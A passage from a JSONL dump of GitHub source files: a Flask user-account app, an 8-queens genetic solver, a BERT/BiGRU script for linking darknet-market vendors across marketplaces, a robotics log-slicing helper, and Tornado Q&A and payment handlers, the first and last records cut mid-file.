secure_filename(f'{username}-{profile_picture.filename}')\n\n profile_picture.save(os.path.join('static/assets', 'profile-pics', safe_filename))\n\n user_repository_singleton.create_user(first_name, last_name, username, hashed_password, safe_filename)\n existing_user = User_account.query.filter_by(username=username).first()\n flash('Account created successfully.')\n session['user'] = {\n 'user_account_id': existing_user.user_account_id,\n 'first_name': existing_user.first_name,\n 'last_name': existing_user.last_name,\n 'username': existing_user.username,\n 'user_account_id': existing_user.user_account_id,\n 'profile_path': existing_user.profile_path,\n }\n return redirect('/profile')\n\n@app.get('/login_page')\ndef login_page():\n return render_template('login.html')\n\n@app.post('/login')\ndef login():\n username = request.form.get('username')\n password = request.form.get('password')\n\n existing_user = User_account.query.filter_by(username=username).first()\n if not existing_user:\n flash('Error logging in. Please try again.')\n return redirect('/login_page')\n\n if not bcrypt.check_password_hash(existing_user.user_password, password):\n flash('Error logging in. Please try again.')\n return redirect('/login_page')\n\n session['user'] = {\n 'user_account_id': existing_user.user_account_id,\n 'first_name': existing_user.first_name,\n 'last_name': existing_user.last_name,\n 'username': existing_user.username,\n 'user_account_id': existing_user.user_account_id,\n 'profile_path': existing_user.profile_path,\n }\n return redirect('/')\n\n@app.post('/logout')\ndef logout():\n if 'user' not in session:\n return redirect('/')\n\n session.pop('user')\n return redirect('/')\n\n\n@app.route('/delete/', methods=['POST'])\ndef delete(user_account_id):\n user_account_id = session['user']['user_account_id']\n user_to_delete = User_account.query.get(user_account_id)\n db.session.delete(user_to_delete)\n db.session.commit()\n return(get_index_render_template(post_repository_singleton.get_all_posts()))\n \n\n@app.get('/search')\ndef search():\n topic = request.args.get('topic')\n order = request.args.get('order')\n if order:\n if order == \"1\":\n all_posts = post_repository_singleton.get_all_posts_ordered()\n return(get_index_render_template(all_posts))\n elif order == \"2\":\n all_posts = post_repository_singleton.get_all_posts_ordered_by_vote()\n return(get_index_render_template(all_posts))\n \n searched_posts = post_repository_singleton.search_post(topic)\n return(get_index_render_template(searched_posts))\n\n@app.get('/update_user_form')\ndef update_user_form():\n\n if 'user' not in session:\n return redirect('/')\n first_name=session['user']['first_name']\n last_name=session['user']['last_name']\n username=session['user']['username']\n return render_template('update_user.html', first_name=first_name, last_name=last_name, username=username)\n\n@app.post('/update_user')\ndef update_user():\n if 'user' not in session:\n return redirect('/login')\n\n user_id=session['user']['user_account_id']\n first_name=session['user']['first_name']\n last_name=session['user']['last_name']\n username=session['user']['username']\n \n password = request.form.get('password')\n\n existing_user = User_account.query.filter_by(user_account_id=user_id).first()\n if not bcrypt.check_password_hash(existing_user.user_password, password):\n flash('Incorrect Password')\n return redirect('/update_user_form')\n\n new_username = request.form.get('username')\n if username != new_username:\n existing_user = User_account.query.filter_by(username=new_username).first()\n if existing_user is not None:\n flash('Username already taken.')\n return redirect('/update_user_form')\n user_repository_singleton.update_username(user_id, new_username)\n\n new_first_name = request.form.get('firstname')\n if first_name != new_first_name:\n user_repository_singleton.update_user_first_name(user_id, new_first_name)\n\n new_last_name = request.form.get('lastname')\n if last_name != new_last_name:\n user_repository_singleton.update_user_last_name(user_id, new_last_name)\n\n new_pw1 = request.form.get('new_pw')\n new_pw2 = request.form.get('new_pw2')\n\n if new_pw1 != '' and new_pw2 != '':\n if new_pw1 != new_pw2:\n flash('New passwords do not match')\n return redirect('/update_user_form')\n else:\n hashed_bytes = bcrypt.generate_password_hash(new_pw1, int(os.getenv('BCRYPT_ROUNDS')))\n hashed_password = hashed_bytes.decode('utf-8')\n user_repository_singleton.update_password(user_id, hashed_password)\n\n session.pop('user')\n\n existing_user = User_account.query.filter_by(user_account_id=user_id).first()\n session['user'] = {\n 'user_account_id': existing_user.user_account_id,\n 'first_name': existing_user.first_name,\n 'last_name': existing_user.last_name,\n 'username': existing_user.username,\n 'user_account_id': existing_user.user_account_id,\n 'profile_path': existing_user.profile_path,\n }\n \n return redirect('/profile/settings')\n\n\n@app.route('/delete/', methods=['POST'])\ndef delete_comment(comment_id):\n comment_id = int(comment_id)\n comment_to_delete = User_comment.query.get(comment_id)\n db.session.delete(comment_to_delete)\n db.session.commit()\n return(get_index_render_template(post_repository_singleton.get_all_posts()))\n","repo_name":"Fenshway/ITSC-3155-Final-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21508177731","text":"import numpy as np\nimport random\n\n\nclass Solver_8_queens:\n\n board_width = 8\n cross_prob = 0.4\n mut_prob = 0.2\n pop_size = 101\n\n FitValue = np.zeros((pop_size, 1), dtype=np.int) # для хранения значений Fitnesses для всей популяции\n population = np.zeros((pop_size, board_width), dtype=np.int)\n\n def __init__(self, pop_size=80, cross_prob=0.25, mut_prob=0.9):\n self.pop_size = pop_size\n self.cross_prob = cross_prob\n self.mut_prob = mut_prob\n\n def solve(self, min_fitnes=0.07, max_epochs=50000):\n iter = 0\n self.generate_population()\n\n viner, ibest = self.CalculateFitnesses()\n while viner < 0 and iter < max_epochs and float(self.FitValue[ibest])/28 > min_fitnes:\n iter = iter + 1\n self.SortIndivids()\n self.Crossing()\n self.Mutation()\n viner, ibest = self.CalculateFitnesses()\n\n return self.FitValue[ibest], iter, self.Visual(self.population[ibest])\n\n def generate_population(self): #Генерация исходной популяции\n for hromosom in self.population:\n for position in range(len(hromosom)):\n hromosom[position] = random.randrange(0, self.board_width-1, 1)\n\n def CalculateFitnesses(self):\n BestFit = 2 * self.board_width\n winner = -1\n ibest = 0\n for i in range(self.pop_size):\n Fit_V = self.Fitness(self.population[i])\n self.FitValue[i] = Fit_V\n if Fit_V < BestFit:\n BestFit = Fit_V\n ibest = i\n if BestFit == 0:\n winner = i\n ibest = i\n break\n return winner, ibest\n\n def Fitness(self, gen):\n Fit = 0\n for igen in range(0, self.board_width - 1, 1):\n for jgen in range(igen + 1, self.board_width, 1):\n if gen[igen] == gen[jgen] or abs(gen[igen] - gen[jgen]) == abs(igen - jgen) or abs(\n gen[igen] + gen[jgen]) == abs(igen + jgen):\n Fit = Fit + 1\n\n return Fit\n\n def SortIndivids(self):\n for i in range(self.pop_size - 1):\n for j in range(i + 1, self.pop_size):\n if self.FitValue[i] > self.FitValue[j]:\n a = self.population[j].copy()\n self.population[j] = self.population[i]\n self.population[i] = a\n\n b = self.FitValue[j].copy()\n self.FitValue[j] = self.FitValue[i]\n self.FitValue[i] = b\n\n def Crossing(self):\n ngood = self.pop_size // 2\n nthebest = self.pop_size // 4\n\n for igood in range(ngood):\n ithebest = random.randrange(0, 32767, 1) % (nthebest + 1)\n while igood == ithebest:\n ithebest = random.randrange(0, 32767, 1) % (nthebest + 1)\n break\n\n if ithebest == nthebest:\n ithebest = self.pop_size // 2 + random.randrange(0, 32767, 1) % (self.pop_size // 2)\n\n parent1 = self.population[igood]\n parent2 = self.population[ithebest]\n parent1, parent2 = self.DoCross(parent1, parent2)\n\n self.population[2 * igood] = parent1\n self.population[2 * igood + 1] = parent2\n\n def DoCross(self, parent1, parent2):\n breakpoint = random.randrange(0, self.board_width-1, 1)\n child1=np.zeros(self.board_width, dtype=np.uint8)\n child2 = np.zeros(self.board_width, dtype=np.uint8)\n\n for i in range(breakpoint):\n child1[i] = parent1[i]\n child2[i] = parent2[i]\n\n for i in range(breakpoint+1, self.board_width):\n child1[i] = parent2[i]\n child2[i] = parent1[i]\n return child1, child2\n\n def Mutation(self):\n for i in range(int(self.mut_prob * self.pop_size)):\n n = random.randrange(0, self.pop_size, 1)\n k = random.randrange(0, self.board_width-1, 1)\n self.population[n, k] = random.randrange(0, self.board_width-1, 1)\n\n def Visual(self, gen):\n visualization = np.zeros((self.board_width, self.board_width), dtype=np.dtype)\n for j in range(self.board_width):\n for i in range(self.board_width):\n if gen[j] == i:\n visualization[i, j] ='Q'\n else:\n visualization[i, j] ='+'\n return visualization\n\n\n\n\n\n\n\n","repo_name":"SlavaCat118/Mod_Matrix_Randomizer","sub_path":"nqueens1.py","file_name":"nqueens1.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34754213862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom .humble_response_exception import HumbleResponseException\n\n__license__ = \"MIT\"\n\n\nclass HumbleAuthenticationException(HumbleResponseException):\n \"\"\"\n Authentication failed due to a rejected authentication cookie\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Parameterized constructor for the HumbleAuthenticationException.\n :param list args: (optional) Extra positional args to pass to the request.\n :param dict kwargs: (optional) Extra keyword args to pass to the request.\n \"\"\"\n\n super(HumbleAuthenticationException, self).__init__(*args, **kwargs)\n","repo_name":"talonius/hb-downloader","sub_path":"hb_downloader/humble_api/exceptions/humble_authentication_exception.py","file_name":"humble_authentication_exception.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"19"} +{"seq_id":"1845829859","text":"\"\"\"\nPython version : 3.8\nDescription : Trains a 2-layered BiGRU classifier initialized with pre-trained BERT-based Classifier\n\"\"\"\n\n# %% Loading Libraries\nimport os, sys, time\nimport random\nimport argparse\nfrom pathlib import Path\nimport logging\nfrom torch import cuda\nfrom tqdm import tqdm \nimport pickle\n\nfrom collections import Counter\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler\n\nfrom transformers import BertTokenizer, BertForSequenceClassification\n\n# %% Loading custom evaluation libraries \nsys.path.append('../metrics/')\nfrom performance import f1_score_func, accuracy_per_class\n\n# Loading the custom utility library\nsys.path.append('../utilities/')\nfrom load_data import FetchData\nfrom utils import merge_and_create_dataframe\nfrom traininghelpers import trainGRUBERT, evaluateGRUBERT\n\n# Loading the custom GRU achitecture\nsys.path.append('../architectures/')\nfrom GRUClassifier import BiGRUBertClassifier\n\n# %% Setting up the Argparser\nparser = argparse.ArgumentParser(description=\"Trainining a 2-layered BiGRU classifier initialized with pre-trained BERT-based Classifier\")\nparser.add_argument('--pretrained_model', type=str, default=\"bert\", help=\"Pre-trained model to intialize the BiGRU model\")\nparser.add_argument('--mode', type=str, default=\"train\", help=\"Can be train or evaluate\")\nparser.add_argument('--data_to_load_pretrain_model', type=str, default='alpha-dreams', help=\"\"\"Datasets to be loaded for pre-trained model (can be \"alpha-dreams\", \"dreams-silk\", \"alpha-silk\", or \"alpha-dreams-silk\")\"\"\")\nparser.add_argument('--data_to_train', type=str, default='valhalla-berlusconi', help=\"\"\"Datasets to be evaluated (can be \"traderoute-agora\" or \"valhalla-berlusconi\")\"\"\")\nparser.add_argument('--data_dir', type=str, default='../data', help=\"\"\"Data directory of the pre-processed data (if your data is not pre-processed, we recommend you to go to the statistical model and process it first.)\"\"\")\nparser.add_argument('--bert_layer', type=str, default=\"weighted-sum-last-four\", help=\"\"\"Bert layer to extract embeddings from. Layer can only be last, second-to-last, first, weighted-sum-last-four, all, or concat-last-4 \"\"\")\nparser.add_argument('--load_model', type=str, default=\"../models/bert/epoch_39.model\", help=\"Loading the trained model\")\nparser.add_argument('--save_model_dir', type=str, default=os.path.join(os.getcwd(), \"../models/knowledge-transfer/valhalla-berlusconi/weighted-sum-last-four/\"), help=\"\"\"Directory for models to be saved\"\"\")\nparser.add_argument('-lr', type=float, default=4e-5, help=\"learning rate\")\nparser.add_argument('--batch_size', type=int, default=32, help=\"Batch Size\")\nparser.add_argument('--nb_epochs', type=int, default=100, help=\"Number of Epochs\")\nparser.add_argument(\"--hidden_units\", type=int, default=768, help=\"Number of hidden units \")\nparser.add_argument(\"--embedding_len\", type=int, default=768, help=\"Embedding size \")\nparser.add_argument('--max_seq_len', type=int, default=512, help=\"Maximum Sequence length the model will support\")\nparser.add_argument('--n_layers', type=int, default=2, help=\"Number of Bi-GRU layers\")\nparser.add_argument('--early_stopping', type=bool, default=True, help=\"Early stopping to stop training when early_stopping_metric doesn’t improve\")\nparser.add_argument('--eval_per_steps', type=int, default=2000, help=\"Evaluate after n number of steps in training data\")\nparser.add_argument('--delta', type=float, default=0.01, help=\"Minimum change for Early Stopping\")\nparser.add_argument('--patience', type=int, default=3, help=\"Early Stopping patience\")\nparser.add_argument('--seed', type=int, default=1111, help='Random seed value')\nparser.add_argument('-dropout', type=float, default=0.65, help=\"Dropout for the linear layer to classify\")\nparser.add_argument('--version', type=str, default='full', help='Run of small data of full data. can be (\"small\" or \"full\").')\nparser.add_argument('--setting', type=str, default='low', help=\"Low for low-resource setting and High for high-resource setting\")\nparser.add_argument('--n_splits', type=int, default=5, help='Number of trials to perform cross validation')\nparser.add_argument('--split_ratio', type=float, default=0.25, help=\"Splitting ratio for the dataset\")\nparser.add_argument('--preprocess_flag', action='store_true', help='Preprocess data')\nparser.add_argument('--ads_count', type=int, default=20, help=\"Minimum number of advertisements per vendor\")\nargs = parser.parse_args()\n\n\nlogging.basicConfig(level=logging.ERROR)\n# Creating a directory if the path doesn't exist\nPath(os.path.join(args.save_model_dir, args.pretrained_model)).mkdir(parents=True, exist_ok=True)\n\n# setting random seed\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.determinstic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# %% Loading the datasets\nalpha_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_alpha.csv\"), error_bad_lines=False, \n lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\ndreams_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_dreams.csv\"), error_bad_lines=False, \n lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\nsilk_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_silk.csv\"), error_bad_lines=False, \n lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\nagora_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_agora.csv\"), error_bad_lines=False, encoding = \"ISO-8859-1\")\nagora_df = agora_df[['Vendor', ' Item', ' Item Description']]\nagora_df.columns = ['vendor', 'title', 'description']\nagora_df['vendor'] = agora_df['vendor'].apply(lambda x : str(x).lower())\n\ndata_df = {\"alpha\":alpha_df, \"dreams\":dreams_df, \"silk\":silk_df, \"agora\":agora_df}\n\n[(train_alpha_dreams, train_dreams_silk, train_alpha_silk, train_alpha_dreams_silk, train_alpha, train_dreams, train_silk), (test_alpha_dreams, test_dreams_silk, test_alpha_silk, test_alpha_dreams_silk, test_alpha, test_dreams, test_silk)] = FetchData(data_df, args.version, args.data_to_load_pretrain_model, args.split_ratio, args.preprocess_flag, args.setting, args.ads_count, args.seed).split_data()\n[(train_valhalla_traderoute, train_traderoute_berlusconi, train_valhalla_berlusconi, train_traderoute_agora, train_valhalla_traderoute_berlusconi, train_valhalla, train_traderoute, train_berlusconi, train_agora), (test_valhalla_traderoute, test_traderoute_berlusconi, test_valhalla_berlusconi, test_traderoute_agora, test_valhalla_traderoute_berlusconi, test_valhalla, test_traderoute, test_berlusconi, test_agora)] = FetchData(data_df, args.version, args.data_to_train, args.split_ratio, args.preprocess_flag, \"low\", args.ads_count, args.seed).split_data()\n\n# %% Loading pre-trained model\ndata = pd.concat([train_dreams, test_dreams, train_alpha, test_alpha, train_silk, test_silk])\nall_vendors = list(data['vendor'].unique())\nvendor_to_idx_dict = {vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n\n# Initialize the BERT tokenizer and model\ntokenizer = BertTokenizer.from_pretrained('bert-base-cased', truncation=True, do_lower_case=True)\nbert_model = BertForSequenceClassification.from_pretrained(\"bert-base-cased\",\n num_labels=len(vendor_to_idx_dict),\n output_attentions=False,\n output_hidden_states=True).to(device)\n\n# load model\nbert_model.load_state_dict(torch.load(args.load_model))\nbert_model.eval()\nbert_model.zero_grad()\n\nif args.data_to_train == \"traderoute-agora\":\n data_df = pd.concat([train_traderoute, test_traderoute, train_agora, test_agora])\n all_vendors = list(data_df['vendor'].unique())\n vendor_to_idx_dict = {vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n \n train_traderoute['vendor'] = train_traderoute['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_traderoute['vendor'] = test_traderoute['vendor'].replace(vendor_to_idx_dict, regex=True)\n train_agora['vendor'] = train_agora['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_agora['vendor'] = test_agora['vendor'].replace(vendor_to_idx_dict, regex=True)\n\n train_traderoute = merge_and_create_dataframe(train_traderoute)\n test_traderoute = merge_and_create_dataframe(test_traderoute)\n train_agora = merge_and_create_dataframe(train_agora)\n test_agora = merge_and_create_dataframe(test_agora)\n\n # merging the training and test data\n train_df = pd.concat([train_traderoute, train_agora]).drop_duplicates()\n test_df = pd.concat([test_traderoute, test_agora]).drop_duplicates()\n\nelif args.data_to_train == \"valhalla-berlusconi\":\n data_df = pd.concat([train_valhalla, test_valhalla, train_berlusconi, test_berlusconi])\n all_vendors = list(data_df['vendor'].unique())\n vendor_to_idx_dict = {vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n\n train_valhalla['vendor'] = train_valhalla['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_valhalla['vendor'] = test_valhalla['vendor'].replace(vendor_to_idx_dict, regex=True)\n train_berlusconi['vendor'] = train_berlusconi['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_berlusconi['vendor'] = test_berlusconi['vendor'].replace(vendor_to_idx_dict, regex=True)\n\n train_valhalla = merge_and_create_dataframe(train_valhalla)\n test_valhalla = merge_and_create_dataframe(test_valhalla)\n train_berlusconi = merge_and_create_dataframe(train_berlusconi)\n test_berlusconi = merge_and_create_dataframe(test_berlusconi)\n\n # merging the training and test data\n train_df = pd.concat([train_valhalla, train_berlusconi]).drop_duplicates()\n test_df = pd.concat([test_valhalla, test_berlusconi]).drop_duplicates()\n \nelse:\n raise Exception(\"data_to_train can only be either valhalla-berlusconi or traderoute-agora\")\n\n# Splitting the data into train and validation dataset\ntrain_df, val_df = train_test_split(train_df, test_size=0.05, random_state=args.seed, shuffle=True)\n\n# Initializing the GRU model for Bert Embeddings\ngru_model = BiGRUBertClassifier(vocab_size=len(tokenizer.get_vocab()), embedding_size=args.embedding_len, hidden_units=args.hidden_units, \n max_seq_len=args.max_seq_len, batch_size=args.batch_size, n_layers=args.n_layers, \n output_size=len(all_vendors))\n\nnum_of_parameters = sum(map(torch.numel, gru_model.parameters()))\nprint(\"Number of parameters:\", num_of_parameters)\n\n# Encoding the train data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(train_df.text.values, \n add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=args.max_seq_len, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(train_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n\n# Data Loaders\ntrain_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# Encoding the val data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(val_df.text.values, \n add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=args.max_seq_len, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(val_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n# Data Loaders\nvalid_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# valid_weights = extract_layer_representations_from_bert_last_layer(bert_model, valid_dataloader, attention_masks, vendor_to_idx_dict, device)\n\n# Encoding the test data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(test_df.text.values, \n add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=512, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(test_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n# Data Loaders\ntest_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# test_weights = extract_layer_representations_from_bert_last_layer(bert_model, test_dataloader, attention_masks, vendor_to_idx_dict, device)\n\n# %% Training and evaluating the model\n\n# Initializing the optimizer\noptimizer = torch.optim.Adam(gru_model.parameters(), lr=args.lr)\n\n# Training the model\nstart_time = time.time()\ntrainGRUBERT(model=gru_model, pretrained_model=bert_model, layer=args.bert_layer, optimizer=optimizer, criterion = nn.CrossEntropyLoss(), train_loader = train_dataloader,\n valid_loader = valid_dataloader, num_epochs = args.nb_epochs, max_seq_len = args.max_seq_len,\n batch_size = args.batch_size, eval_every = len(train_dataloader) // 2, file_path = args.save_model_dir, device=device)\nend_time = time.time()\nprint(\"Total time taken :\", end_time - start_time)\n\n# Evaluating the model on test data\nprint(\"Evaluation on Test data:\")\n# evaluate_GRU_BERT_model(model=gru_model, valid_loader=test_dataloader, valid_text_embeddings=test_weights, batch_size=args.batch_size, device=device)\nevaluateGRUBERT(model=gru_model, pretrained_model=bert_model, layer=args.bert_layer, valid_loader=test_dataloader, batch_size=args.batch_size, device=device)\n","repo_name":"maastrichtlawtech/VendorLink","sub_path":"vendor-verification/transfer_BiGRU.py","file_name":"transfer_BiGRU.py","file_ext":"py","file_size_in_byte":14850,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"34383322113","text":"from collections import OrderedDict\nfrom duckietown_utils import indent\nfrom duckietown_utils.fuzzy import Spec\n\n\nclass MakeTimeSlice(Spec):\n def __init__(self, spec, t0, t1):\n Spec.__init__(self, [spec])\n self.t0 = t0\n self.t1 = t1\n \n def __str__(self):\n s = 'MakeTimeSlice { %s : %s }' % (self.t0, self.t1)\n s += '\\n' + indent(str(self.children[0]), ' ')\n return s\n \n def match(self, x):\n raise NotImplementedError()\n \n def match_dict(self, seq):\n results = self.children[0].match_dict(seq)\n matches = OrderedDict()\n for k, v in results.items():\n matches[k] = self.transform(v) \n return matches\n \n def transform(self, log):\n if not log.valid:\n return log\n u0 = log.t0\n u1 = log.t1\n assert (u0 is not None) and (u1 is not None), log\n assert u0 <= u1\n if self.t0 is not None:\n new_start = u0 + self.t0\n else:\n new_start = u0\n if self.t1 is not None:\n new_end = u0 + self.t1\n else:\n new_end = u1\n length = new_end-new_start \n return log._replace(t0=new_start, t1=new_end, length=length)\n \ndef slice_time(m, spec):\n if m.group('t0') is not None:\n t0 = float(m.group('t0'))\n else:\n t0 = None\n \n if m.group('t1') is not None:\n t1 = float(m.group('t1'))\n else:\n t1 = None\n return MakeTimeSlice(spec, t0, t1)\n\n# float = \"[-+]?[0-9]*\\.?[0-9]+\"\nfilters_slice = {\n r'{(?P[-+]?[0-9]*\\.?[0-9]+)?:(?P[-+]?[0-9]*\\.?[0-9]+)?}': slice_time,\n}\n","repo_name":"spadma3/duck","sub_path":"catkin_ws/src/00-infrastructure/easy_logs/include/easy_logs/time_slice.py","file_name":"time_slice.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16624458600","text":"#!/usr/bin/env python\n# encoding: utf-8\nfrom tornado import gen\nfrom api.base_handler import BaseHandler\nimport tornado\nfrom common.tools import args404, ObjectToString\nimport re\nimport json\nfrom configs.web_config import Test_Secret_Key, Live_Secret_Key, pingpp_app_key, pingpp_api_key\n\n\n# 问答首页\nclass WorkplaceHomeHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self, page, num, token):\n self.log.info('+++++++++++问答首页 Full+++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.workplace_home(page, num, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 问答首页轮播图\nclass WorkplaceHomeSlideHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self):\n self.log.info('+++++++++++问答首页轮播图 Full+++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.workplace_home_slide(cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 话题列表\nclass TopicListHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def post(self):\n self.log.info('+++++++++++话题列表 Full+++++++++++')\n self.log.info(self.get_arguments())\n cache_flag = self.get_cache_flag()\n page = self.get_argument('page')\n num = self.get_argument('num')\n field = self.get_argument('field')\n token = self.get_argument('token')\n\n result = yield self.db.topic_list(page, num, field, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 专家详情页\nclass ExpertFullHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self, expert, token):\n self.log.info('+++++++++++专家详情页 Full+++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.expert_full(expert, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 话题详情页\nclass TopicFullHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self, topic, token):\n self.log.info('+++++++++++ 话题详情页 TopicFull +++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.topic_full(topic, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 评价列表和详情页\nclass EvaluateGetHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self, page, num, expert, token):\n self.log.info('+++++++++++ 评价列表和详情页 Evaluate +++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.evaluate_get(page, num, expert, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 写评价页\nclass EvaluateEditHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self):\n self.log.info('+++++++++++ 写评价页 Evaluate Edit get +++++++++++')\n cache_flag = self.get_cache_flag()\n token = self.get_argument('token')\n reservation_id = self.get_argument('reservation_id')\n result = yield self.db.evaluate_edit_get(reservation_id, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n @gen.coroutine\n @tornado.web.asynchronous\n def post(self):\n self.log.info('+++++++++++ 写评价页 Evaluate Edit post +++++++++++')\n self.log.info(self.get_arguments())\n cache_flag = self.get_cache_flag()\n token = self.get_argument('token')\n reservation_id = self.get_argument('reservation_id', '')\n score = self.get_argument('score')\n evaluate = self.get_argument('evaluate')\n result = yield self.db.evaluate_edit_post(reservation_id, score, evaluate, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 预约页\nclass ReservationHandler(BaseHandler):\n # @gen.coroutine\n # @tornado.web.asynchronous\n # def get(self): # 已经不用了\n # self.log.info('+++++++++++ Reservation 预约 GET +++++++++++')\n # self.log.info(self.get_arguments())\n # cache_flag = self.get_cache_flag()\n # token = self.get_argument('token')\n # topic_id = self.get_argument('topic_id')\n # # expert_id = self.get_argument('expert_id')\n # result = yield self.db.reservation_get(topic_id, token, cache_flag)\n #\n # self.write(ObjectToString().encode(result))\n # self.finish()\n # return\n\n @gen.coroutine\n @tornado.web.asynchronous\n def post(self):\n self.log.info('+++++++++++ Reservation 预约 POST start +++++++++++')\n self.log.info(self.get_arguments())\n cache_flag = self.get_cache_flag()\n token = self.get_argument('token')\n meet_message = self.get_argument('meet_message')\n meet_question = self.get_argument('meet_question')\n topic_id = self.get_argument('topic_id')\n expert_id = self.get_argument('expert_id')\n result = yield self.db.reservation(topic_id, expert_id, meet_message, meet_question, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 付款页\nclass WorkplacePayHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def post(self):\n self.log.info('+++++++++++ 付款页 200 +++++++++++')\n self.log.info(self.get_arguments())\n cache_flag = self.get_cache_flag()\n\n pingxx_secret_key = pingpp_api_key['test_test']\n ip = self.request.remote_ip\n token = self.get_argument('token')\n pay_type = self.get_argument('pay_type')\n # money = self.get_argument('money')\n topic_id = self.get_argument('topic_id')\n if re.match(r'\\d+', '%s' % token):\n result = yield self.db.workplace_pay(pingpp_app_key, pingxx_secret_key, topic_id,\n pay_type, ip, token, cache_flag)\n else:\n result = dict()\n result['status'] = 'fail'\n result['token'] = token\n result['msg'] = '未登录状态'\n result['data'] = {}\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 付款成功页\nclass WorkplacePaySuccessHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def get(self, message_id, token):\n self.log.info('+++++++++++ 付款成功页 200 +++++++++++')\n cache_flag = self.get_cache_flag()\n result = yield self.db.workplace_pay_success(message_id, token, cache_flag)\n\n self.write(ObjectToString().encode(result))\n self.finish()\n return\n\n\n# 支付返回结果,ping++返回结果\nclass WorkplacePayResultHandler(BaseHandler):\n @gen.coroutine\n @tornado.web.asynchronous\n def post(self):\n self.log.info(\"--------------------------------- ping ++ receive charge result....\")\n self.log.info(self.request.body)\n form = json.loads(self.request.body)\n self.log.info(json.dumps(form, indent=4))\n cache_flag = self.get_cache_flag()\n result = yield 